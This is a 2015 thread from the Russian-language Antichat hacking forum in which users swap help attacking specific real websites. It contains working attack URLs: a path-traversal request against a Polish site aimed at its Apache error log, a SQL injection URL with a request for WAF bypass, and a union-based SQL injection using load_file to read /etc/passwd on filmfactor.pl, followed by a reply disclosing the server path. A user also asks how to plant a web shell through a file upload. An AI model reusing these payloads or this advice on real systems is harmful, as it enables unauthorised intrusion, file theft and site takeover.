ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.06.2015, 11:06
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Код:
Code:
http://esn.po.opole.pl/index2.php?dir=photo&id=../../../../../../../../../../../../../../../../../../../../../../var/log/apache2/error_log/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.&name=img_0160.jpg&site=photo_zoom
Вот тут реально нестандартный еррор лог. Что это? это нестандартный еррор_лог. пробовали файлы сессии? лог ssh авторизации? сделать акк на сайте? найти ацес лог? есть ли возможность использовать врапперы? вообще в случае, когда на хосте крутится еще пара десятков сайтов стоит смотреть в их сторону
.SpoilerTarget" type="button">Spoiler: xek
|
|
|
04.06.2015, 13:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
.SpoilerTarget" type="button">Spoiler
http://beadfxnew.dmt.net/classes/cl...1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+--+
Помогите waf обойти |
|
|
|
04.06.2015, 21:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
35015
Репутация:
57
|
|
Всем привет. Банальный вопрос:Если есть регистрация на сайте то значит сайт как то пишет регистрационные данные в базу.Но уязвимость sql в другом скрипте,например в index.php в параметре id.Так вот когда раскручиваешь скуль то оказывается что у current_user-а права только USAGE и подменить хэш админа он не может.Как так???? Получается что сайт записует данные от привелегирированого юзера??
|
|
|
|
04.06.2015, 21:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
35200
Репутация:
6
|
|
Код:
Code:
http://filmfactor.pl/?st=-1+/*!uNIoN*/+%28/*!SelEcT*/+1,1,load_file('etc/passwd'),1,1,1,1,1,1,1+%29+--+;
Подскажите директорию в которой сайт лежит |
|
|
|
04.06.2015, 21:37
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от huntercs16
huntercs16 said:
↑
Код:
Code:
http://filmfactor.pl/?st=-1+/*!uNIoN*/+%28/*!SelEcT*/+1,1,load_file('etc/passwd'),1,1,1,1,1,1,1+%29+--+;
Подскажите директорию в которой сайт лежит При вызове обычной sql ошибки, дается раскрытие путей:
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/filmfactor/public_html/filmfactor/index.php on line 103
|
|
|
|
05.06.2015, 15:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Никто не подскажет, как можно залить шелл через самописный двигл, имеется спортанский набор: Загрузка файл JPG, PNG,GIF, и обычный HTML редактор. Пробовал пропихнуть шелл через картинку, ничего не получилось, картинка обрабатывается какой то php функцией, и не дает загружать любое другое расширение кроме выше описанных (Корректировка запроса не помогает, все равно срабатывает защита). Так же пробовал в гифку добовлять комментарий - результата 0. Так же в запросе я нашел местечко, куда сгружаются все заблокированные файлы, попробовал подставить, дало ошибку 403)) Так же заметил одну особенность, файлы загружается через SQL запрос. Может быть есть способы заливки шелла именно через HTML редактор, ведь туда что угодно впихнуть можно?
|
|
|
|
05.06.2015, 18:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
44130
Репутация:
26
|
|
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например.
|
|
|
|
05.06.2015, 18:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
98300
Репутация:
31
|
|
Сообщение от Ravenous
Ravenous said:
↑
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например. Burp Suite.
|
|
|
|
05.06.2015, 19:22
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Ravenous
Ravenous said:
↑
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например. HackBar
|
|
|
|
05.06.2015, 20:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
51991
Репутация:
2
|
|
Сообщение от Ravenous
Ravenous said:
↑
Ребя, нужен аналог плагина Live HTTP Headers, ибо он перестал работать ( на кнопку "Повтор" не регагирует). Нужно чтобы была возможноть POST переменные передавать строкой типа &a1=1&a2=2&a3=3, а не по отдельности забивать как в программе HttpReq например. исправленный плагин
+
/threads/422049/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
